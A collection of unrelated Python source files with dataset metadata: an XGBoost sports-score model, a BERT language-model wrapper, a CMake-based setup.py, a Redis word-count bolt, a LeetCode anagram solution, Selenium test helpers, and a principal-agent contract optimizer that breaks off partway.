np.Inf\n\n def __X(self, data_frame: pd.DataFrame) -> pd.DataFrame:\n data_dummies = pd.get_dummies(self.data.select_dtypes('O'))\n X_data = pd.get_dummies(\n data_frame.drop(['score', 'oppo_score'], axis=1)\n )\n\n # Have to get missing dummy columns, because train & test years can have different\n # teams/venues, resulting in data mismatch when trying to predict with a model\n missing_cols = np.setdiff1d(data_dummies.columns, X_data.columns)\n missing_df = pd.DataFrame(\n {missing_col: 0 for missing_col in missing_cols}, index=X_data.index\n )\n\n return pd.concat([X_data, missing_df], axis=1).astype(float)\n\n @staticmethod\n def __compose_two(composed_func: FeatureFunctionType,\n func_element: FeatureFunctionType) -> FeatureFunctionType:\n return lambda x: composed_func(func_element(x))\n\n @staticmethod\n def __y(data_frame: pd.DataFrame) -> pd.Series:\n return data_frame['score'] - data_frame['oppo_score']\n", "sub_path": "server/ml_models/match_xgb/match_xgb.py", "file_name": "match_xgb.py", "file_ext": "py", "file_size_in_byte": 8969, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Tuple", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 35, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 38, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 50, "usage_type": "name"}, {"api_name": "server.types.FeatureFunctionType", "line_number": 50, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_out_of_state", "line_number": 51, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_travel_distance", "line_number": 52, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_last_week_goals", "line_number": 53, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_last_week_behinds", "line_number": 54, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_last_week_result", "line_number": 55, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_last_week_score", "line_number": 56, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_cum_win_points", "line_number": 57, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_rolling_last_week_win_rate", "line_number": 58, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_win_streak", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 61, "usage_type": "name"}, {"api_name": "server.types.FeatureFunctionType", "line_number": 61, "usage_type": "name"}, {"api_name": "server.data_processors.TeamDataStacker", "line_number": 62, "usage_type": "call"}, {"api_name": "server.data_processors.FeatureBuilder", "line_number": 63, "usage_type": "call"}, {"api_name": "server.data_processors.OppoFeatureBuilder", "line_number": 64, "usage_type": "call"}, {"api_name": "server.data_processors.FeatureBuilder", "line_number": 69, "usage_type": "call"}, {"api_name": 
"server.data_processors.feature_functions.add_cum_percent", "line_number": 70, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_ladder_position", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 73, "usage_type": "name"}, {"api_name": "server.data_processors.FitzroyDataReader", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 88, "usage_type": "name"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 89, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 109, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 121, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 109, "usage_type": "attribute"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 135, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 135, "usage_type": "name"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 149, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 149, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 151, "usage_type": "name"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 151, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 175, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 175, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 176, "usage_type": "name"}, {"api_name": "server.types.FeatureFunctionType", "line_number": 176, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 184, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 199, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 199, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 216, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 216, "usage_type": "attribute"}, {"api_name": "numpy.NINF", "line_number": 249, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 248, "usage_type": "name"}, {"api_name": "numpy.Inf", "line_number": 252, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 251, "usage_type": "name"}, {"api_name": "numpy.NINF", "line_number": 255, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 254, "usage_type": "name"}, {"api_name": "numpy.Inf", "line_number": 258, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 257, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 260, "usage_type": "attribute"}, {"api_name": "pandas.get_dummies", "line_number": 261, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.setdiff1d", "line_number": 268, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 269, "usage_type": "call"}, {"api_name": "pandas.concat", 
"line_number": 273, "usage_type": "call"}, {"api_name": "server.types.FeatureFunctionType", "line_number": 276, "usage_type": "name"}, {"api_name": "server.types.FeatureFunctionType", "line_number": 277, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 281, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 281, "usage_type": "attribute"}]}
+{"seq_id": "196521341", "text": "from ml_gym.models.nn.net import NNModel\nfrom typing import Dict\nimport torch\nfrom transformers import AutoConfig, AutoModelForMaskedLM\n\n\nclass BERTLM(NNModel):\n\n def __init__(self, prediction_publication_key: str, bert_version: str = \"bert-base-uncased\"):\n super().__init__()\n self.prediction_publication_key = prediction_publication_key\n config = AutoConfig.from_pretrained(bert_version)\n self.model = AutoModelForMaskedLM.from_config(config)\n\n def forward_impl(self, inputs: torch.Tensor) -> Dict[str, torch.Tensor]:\n outputs = self.model(inputs)\n output_dict = {self.prediction_publication_key: outputs.logits}\n return output_dict\n\n def forward(self, inputs: torch.Tensor) -> Dict[str, torch.Tensor]:\n return self.forward_impl(inputs)\n\n\nif __name__ == '__main__':\n from datasets import load_from_disk\n from transformers import DataCollatorForLanguageModeling, BertTokenizerFast\n from torch.utils.data import DataLoader\n\n tokenizer = BertTokenizerFast(tokenizer_file=\"/scratch/max/mlgym/example/transformer/tokenizers/trained_wiki_tokenizer/tokenizer.json\")\n chunked_tokenized_dataset = load_from_disk(\"example/transformer/preprocessed_datasets/chunked_tokenized_dataset_train\")\n mlm_probability = 0.15\n batch_size = 30\n\n data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm_probability=mlm_probability, pad_to_multiple_of=8)\n\n train_dataloader = DataLoader(chunked_tokenized_dataset, shuffle=True, batch_size=batch_size, collate_fn=data_collator)\n\n sample = next(iter(train_dataloader))\n model = BERTLM(\"\")\n prediction = model(sample[\"input_ids\"])\n print(\"\")\n", "sub_path": "example/bert/bert_model.py", "file_name": "bert_model.py", "file_ext": "py", "file_size_in_byte": 1687, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "ml_gym.models.nn.net.NNModel", "line_number": 7, "usage_type": "name"}, {"api_name": "transformers.AutoConfig.from_pretrained", "line_number": 12, "usage_type": "call"}, {"api_name": "transformers.AutoConfig", "line_number": 12, "usage_type": "name"}, {"api_name": "transformers.AutoModelForMaskedLM.from_config", "line_number": 13, "usage_type": "call"}, {"api_name": "transformers.AutoModelForMaskedLM", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 15, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 20, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 20, "usage_type": "name"}, {"api_name": "transformers.BertTokenizerFast", "line_number": 29, "usage_type": "call"}, {"api_name": "datasets.load_from_disk", "line_number": 30, "usage_type": "call"}, {"api_name": "transformers.DataCollatorForLanguageModeling", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "38966670", "text": "import os\nimport re\nimport sys\nimport platform\nimport subprocess\nfrom distutils.version import LooseVersion\nfrom setuptools import setup, Extension\nfrom setuptools.command.build_ext import build_ext\n\n\nclass CMakeExtension(Extension):\n def __init__(self, name, sourcedir=''):\n Extension.__init__(self, name, sources=[])\n self.sourcedir = os.path.abspath(sourcedir)\n\n\nclass CMakeBuild(build_ext):\n def run(self):\n try:\n out = subprocess.check_output(['cmake', '--version'])\n except OSError:\n raise RuntimeError(\n \"CMake must be installed to build the following extensions: \" +\n \", \".join(e.name for e in self.extensions))\n\n if platform.system() == \"Windows\":\n cmake_version = LooseVersion(re.search(r'version\\s*([\\d.]+)',\n out.decode()).group(1))\n if cmake_version < '3.1.0':\n raise RuntimeError(\"CMake >= 3.1.0 is required on Windows\")\n\n for ext in self.extensions:\n self.build_extension(ext)\n\n def build_extension(self, ext):\n extdir = os.path.abspath(\n os.path.dirname(self.get_ext_fullpath(ext.name)))\n cmake_args = ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,\n '-DPYTHON_EXECUTABLE=' + sys.executable]\n\n cfg = 'Debug' if self.debug else 'Release'\n build_args = ['--config', cfg]\n\n if platform.system() == \"Windows\":\n cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(\n cfg.upper(),\n extdir)]\n if sys.maxsize > 2**32:\n cmake_args += ['-A', 'x64']\n build_args += ['--', '/m']\n else:\n cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg]\n build_args += ['--', '-j2']\n\n env = os.environ.copy()\n env['CXXFLAGS'] = '{} -DVERSION_INFO=\\\\\"{}\\\\\"'.format(\n env.get('CXXFLAGS', ''),\n self.distribution.get_version())\n if not os.path.exists(self.build_temp):\n os.makedirs(self.build_temp)\n subprocess.check_call(['cmake', ext.sourcedir] + cmake_args,\n cwd=self.build_temp, env=env)\n subprocess.check_call(['cmake', '--build', '.'] + build_args,\n cwd=self.build_temp)\n print() # Add an empty line for cleaner output\n\nrequirements = [\n 'numpy>=1.16.5',\n ]\n\ntest_requirements = [\n 'numpy>=1.16.5',\n ]\n\nlong_description = \"Python library for sGMRFmix model for anomaly detection in time-series data. sGMRFmix is short for sparse mixture of Gaussian Markov Random Fields. 
This is essentially a C++ (and python) port of the R package `sGMRFmix` to make it run faster for larger datasets.\"\n\nsetup(\n name='sgmrfmix',\n version='0.1',\n author='Anand K Subramanian',\n author_email='anandkrish894@gmail.com',\n url='https://github.com/AntixK/sGMRFmix',\n description='Python library for sparse Gaussian Markov Random Field mixtures for anomaly detection',\n long_description=long_description,\n packages=['sgmrfmix'],\n ext_modules=[CMakeExtension('_sgmrfmix')],\n cmdclass=dict(build_ext=CMakeBuild),\n install_requires=requirements,\n tests_require=test_requirements,\n zip_safe=False,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Topic :: Scientific/Engineering\",\n ],\n python_requires='>=3.6', # For Python thread specific storage API\n)", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 3668, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "setuptools.Extension", "line_number": 11, "usage_type": "name"}, {"api_name": "setuptools.Extension.__init__", "line_number": 13, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 13, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "setuptools.command.build_ext.build_ext", "line_number": 17, "usage_type": "name"}, {"api_name": "subprocess.check_output", "line_number": 20, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 26, "usage_type": "call"}, {"api_name": "distutils.version.LooseVersion", "line_number": 27, "usage_type": "call"}, {"api_name": "re.search", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 39, "usage_type": "attribute"}, {"api_name": "platform.system", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.environ.copy", "line_number": 55, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 60, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 61, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 63, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "541345508", "text": "import os\nfrom collections import Counter\n\nfrom redis import StrictRedis\n\nfrom streamparse import Bolt\n\n\nclass WordCountBolt(Bolt):\n outputs = ['word', 'count']\n\n def initialize(self, conf, ctx):\n self.counter = Counter()\n self.pid = os.getpid()\n self.total = 0\n\n def _increment(self, word, inc_by):\n self.counter[word] += inc_by\n self.total += inc_by\n\n def process(self, tup):\n word = tup.values[0]\n self._increment(word, 10 if word == \"dog\" else 1)\n if self.total % 1000 == 0:\n self.logger.info(\"counted [{:,}] words [pid={}]\".format(self.total,\n self.pid))\n self.emit([word, self.counter[word]])\n\n\nclass RedisWordCountBolt(WordCountBolt):\n def initialize(self, conf, ctx):\n self.pid = os.getpid()\n self.redis = StrictRedis()\n self.total = 0\n\n def _increment(self, word, inc_by):\n self.total += inc_by\n self.redis.zincrby(\"words\", word, inc_by)\n", "sub_path": "examples/redis/src/bolts.py", "file_name": "bolts.py", "file_ext": "py", "file_size_in_byte": 1041, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "streamparse.Bolt", "line_number": 9, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 32, "usage_type": "call"}, {"api_name": "redis.StrictRedis", "line_number": 33, "usage_type": "call"}]}
+{"seq_id": "165893189", "text": "import collections\nfrom typing import List\n\n\nclass Solution:\n def findAnagrams(self, s: str, p: str) -> List[int]:\n if not p or len(p) > len(s): return []\n\n p_hash = collections.Counter(p)\n m, n, desired, formed = len(s), len(p), len(p_hash), 0\n s_hash = collections.defaultdict(int)\n result = []\n\n for j in range(n):\n c = s[j]\n s_hash[c] += 1\n if c in p_hash and p_hash[c] == s_hash[c]: formed += 1\n\n if formed == desired: result.append(0)\n\n r = n\n while r < m:\n l = r - n + 1 # get 1st char in n size window\n out_c, in_c = s[l - 1], s[r]\n\n if out_c in p_hash and p_hash[out_c] == s_hash[out_c]: formed -= 1\n s_hash[out_c] -= 1\n\n s_hash[in_c] += 1\n if in_c in p_hash and p_hash[in_c] == s_hash[in_c]: formed += 1\n\n if formed == desired: result.append(l)\n r += 1\n\n return result\n\n\n\n\n\n\n# 438. Find All Anagrams in a String\n# https://leetcode.com/problems/find-all-anagrams-in-a-string/description/\n\n# 'aabc' 'abc'\n\n# formed = 2\n# desired = 3\n\n\n# \"aab\"\n# {\n# a: 1\n# b: 1\n \n# }\n\n# \"ab\"\n\n# { a:1\n# b:1 \n# }\n\n# \"cbaebabacd\"\n# \"abc\"\n", "sub_path": "strings/sliding_window/find_all_anagrams_in_a_string.py", "file_name": "find_all_anagrams_in_a_string.py", "file_ext": "py", "file_size_in_byte": 1238, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "collections.Counter", "line_number": 9, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 11, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 6, "usage_type": "name"}]}
+{"seq_id": "374452769", "text": "from selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom time import *\r\nimport sys\r\nsys.path.append('..')\r\nfrom TestModel import BasePage, Functions\r\n\r\nclass Search(BasePage.BaseClass):\r\n\r\n def click_createanewone_button(self):\r\n WebDriverWait(self.driver, 15, 0.5).until(EC.element_to_be_clickable((By.XPATH, \"//div[@ng-if='allowAccountCreation']/a\"))).click()\r\n \r\n def input_searchkeyword(self, keyword):\r\n sleep(2)\r\n WebDriverWait(self.driver, 15, 0.5).until(EC.presence_of_element_located((By.XPATH, \"//input[@type='search']\"))).send_keys(keyword)\r\n sleep(1)\r\n self.driver.find_element_by_xpath(\"//input[@type='search']\").send_keys(Keys.ENTER)\r\n Functions.wait_element_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")\r\n Functions.wait_element_not_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")\r\n\r\n def click_view_button(self):\r\n js = \"var q=document.documentElement.scrollTop=10000\"\r\n self.driver.execute_script(js)\r\n WebDriverWait(self.driver, 20, 0.5).until(EC.visibility_of_element_located((By.XPATH, \"//button[@class='secondary-button desktop-only medium']\"))).click()\r\n Functions.wait_element_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")\r\n Functions.wait_element_not_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")\r\n if(Functions.wait_element_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")):\r\n Functions.wait_element_not_visible(self.driver, By.XPATH, \"//h3[@class ='modal-title']\")\r\n\r\n\r\n\r\n", "sub_path": "MIG_Portal_Automation/TestElements/Common_SearchScreen.py", "file_name": "Common_SearchScreen.py", "file_ext": "py", "file_size_in_byte": 1749, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.append", "line_number": 7, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "TestModel.BasePage.BaseClass", "line_number": 10, "usage_type": "attribute"}, {"api_name": "TestModel.BasePage", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.element_to_be_clickable", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 17, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 19, "usage_type": "attribute"}, {"api_name": 
"selenium.webdriver.common.keys.Keys", "line_number": 19, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_visible", "line_number": 20, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 20, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_not_visible", "line_number": 21, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 21, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 21, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 21, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 26, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 26, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_visible", "line_number": 27, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 27, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 27, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 27, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_not_visible", "line_number": 28, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 28, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 28, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 28, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_visible", "line_number": 29, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 29, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 29, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 29, "usage_type": "name"}, {"api_name": "TestModel.Functions.wait_element_not_visible", "line_number": 30, "usage_type": "call"}, {"api_name": "TestModel.Functions", "line_number": 30, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.XPATH", "line_number": 30, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 30, "usage_type": "name"}]}
+{"seq_id": "254856996", "text": "\"\"\"\nThis class includes the principal optimization problem.\n\"\"\"\n__all__ = ['PrincipalProblem']\n\n\nimport theano\nimport theano.tensor as T\nimport itertools\nimport design\nimport numpy as np\nimport sys\nimport scipy.optimize as opt\nfrom sepdesign._types import AgentType\nfrom sepdesign._agent import Agent\nfrom sepdesign._utility_functions import UtilityFunction\nfrom sepdesign._value_functions import ValueFunction\nfrom sepdesign._transfer_functions import TransferFunction\nfrom sepdesign._individual_rationality import IndividualRationality\nfrom sepdesign._function import *\nimport warnings\ntry:\n import pyipopt\nexcept:\n warnings.warn('*** Could not find pyipopt. ***')\ntry:\n from pyDOE import lhs\nexcept:\n warnings.warn('*** Could not find pyDOE. ***')\n\n# Flattens a list of lists\nflatten = lambda l: [item for sublist in l for item in sublist]\n\n\ndef run_and_print(func, verbosity, *args, **kwargs):\n \"\"\"\n Run func(*args, **kwargs) and print something msg.\n \"\"\"\n if verbosity >= 0:\n sys.stdout.write('Running ' + str(func) + '...')\n res = func(*args, **kwargs)\n if verbosity >= 0:\n sys.stdout.write(' Done!\\n')\n return res\n\n\nclass PrincipalProblem(object):\n \"\"\"\n A class representing the problem faced by the principal.\n\n :param u: A utility function for the principal.\n :param v: A value function for the system.\n :param agents: A list of agents. Each element of the list is either.\n :param t: The form of the transfer function.\n :param sg_level: The sparse grid level for taking the expectation over\n the xi's.\n :param verbosity: The verbosity level of the class.\n \"\"\"\n\n def __init__(self, u, v, agents, t, sg_level=6, verbosity=1):\n assert isinstance(u, UtilityFunction)\n self._u = u\n assert isinstance(v, ValueFunction)\n self._v = v\n if isinstance(agents, Agent):\n agents = [agents]\n assert isinstance(agents, list)\n for a in agents:\n assert isinstance(a, Agent)\n assert len(agents) == v.num_subsystems\n self._agents = agents\n assert isinstance(t, TransferFunction)\n self._t = t\n assert isinstance(sg_level, int)\n self._sg_level = sg_level\n assert isinstance(verbosity, int)\n self._verbosity = verbosity\n self._setup_exp_u()\n self._num_param = np.sum([a.num_types for a in self.agents]) * t.num_a\n self._compiled = False\n\n def _setup_exp_u(self):\n \"\"\"\n Set up the following:\n + self.exp_u_raw: The expected utility of the principal as a\n Function of e_star and the transfer function\n parameters a. This is a Function. \n + self.exp_u: The expected utility of the principal as a function\n of the transfer function parameters a. This is a\n common Python function. 
It also returns the\n gradient of the exp_u with respect to a.\n \"\"\"\n # Set up the individual rationality constraints\n self._setup_irc()\n # Symbolic parameters of transfer functions (i-k)\n t_as = [[] for _ in range(self.num_agents)]\n # Symbolic optimal efforts (i-k)\n t_e_stars = [[] for _ in range(self.num_agents)]\n # Symbolic xis (i)\n t_xis = []\n # Symbolic efforts (i-k)\n t_qs = [[] for _ in range(self.num_agents)]\n t_ts = [[] for _ in range(self.num_agents)]\n for i in range(self.num_agents):\n t_xis.append(T.dvector('xi{%d}' % i))\n for k in range(self.agents[i].num_types):\n t_as[i].append(T.dvector('a{%d,%d}' % (i, k)))\n t_e_stars[i].append(T.scalar('e_stars{%d,%d}' % (i, k)))\n q_base = self.agents[i].agent_types[k].q\n t_qs[i].append(theano.clone(q_base.t_f,\n replace={q_base.t_x[0]: t_e_stars[i][k],\n q_base.t_x[1]: t_xis[i]}))\n t_ts[i].append(theano.clone(self.t.t_f,\n replace={self.t.t_x[0]: t_qs[i][k],\n self.t.t_x[1]: t_as[i][k]}))\n # For all possible combinations of agent types\n # Expected utility functions\n t_sum_u_over_comb = T.zeros((1,))\n for at_comb in self._agent_type_range(): # Loop over agent type combs\n # Get the value function for this combination of types in theano:\n t_v_comb = theano.clone(self.v.t_f,\n replace=dict((self.v.t_x[i], t_qs[i][at_comb[i]])\n for i in range(self.num_agents)))\n # The payoff to the principal for this combination of types\n t_pi_comb = t_v_comb - T.sum(\n [t_ts[i][at_comb[i]] for i in range(self.num_agents)], \n axis=0)\n # Multiply with the probability of type happening\n p_comb = np.prod([self.agents[i].type_probabilities[at_comb[i]] \n for i in range(self.num_agents)])\n # The utility of the principal for this combination of types\n t_u = theano.clone(self.u.t_f, replace={self.u.t_x[0]: t_pi_comb})\n # Start summing up\n t_sum_u_over_comb += p_comb * t_u\n #theano.printing.pydotprint(t_sum_u_over_comb, outfile='tmp.png')\n # Take the expectation over the Xi's numerically\n Z, w_unorm = design.sparse_grid(self.num_agents, self._sg_level, 'GH')\n Xi = Z * np.sqrt(2.0)\n w = w_unorm / np.sqrt(np.pi ** self.num_agents)\n t_tmp = theano.clone(t_sum_u_over_comb,\n replace=dict((t_xis[i], Xi[:, i])\n for i in range(self.num_agents)))\n #theano.printing.pydotprint(t_tmp, outfile='tmp.png')\n # THEANO OBJECT REPRESENTING THE EXPECTED UTILITY OF THE PRINCIPAL:\n t_exp_u_raw = T.dot(w, t_tmp)\n t_e_stars_f = flatten(t_e_stars)\n t_as_f = flatten(t_as)\n self._exp_u_raw = Function(t_e_stars_f + t_as_f, t_exp_u_raw)\n # Take derivative with respect to e_stars\n self._exp_u_raw_g_e = self._exp_u_raw.grad(t_e_stars_f)\n # Take derivative with respect to the as\n self._exp_u_raw_g_a = self._exp_u_raw.grad(t_as_f)\n\n def compile(self):\n \"\"\"\n Compile all Functions.\n \"\"\"\n run_and_print(self.exp_u_raw.compile, self.verbosity) \n run_and_print(self.exp_u_raw_g_e.compile, self.verbosity)\n run_and_print(self.exp_u_raw_g_a.compile, self.verbosity)\n for i in range(self.num_agents):\n for k in range(self.agents[i].num_types):\n run_and_print(self._irc[i][k].compile, self.verbosity)\n self._compiled = True\n \n def evaluate(self, a):\n \"\"\"\n Evaluate the expected utility of the principal along with its gradient\n with respect to a.\n \"\"\"\n if not self._compiled:\n raise RuntimeError('You must compile first.')\n # We will return a dictionary with the results\n res = {}\n # aas[i][k] is the transfer parameters of agent i type k\n aas = [[] for i in range(self.num_agents)]\n # e_stars[i][k] is the optimal effort of agent i type k\n e_stars 
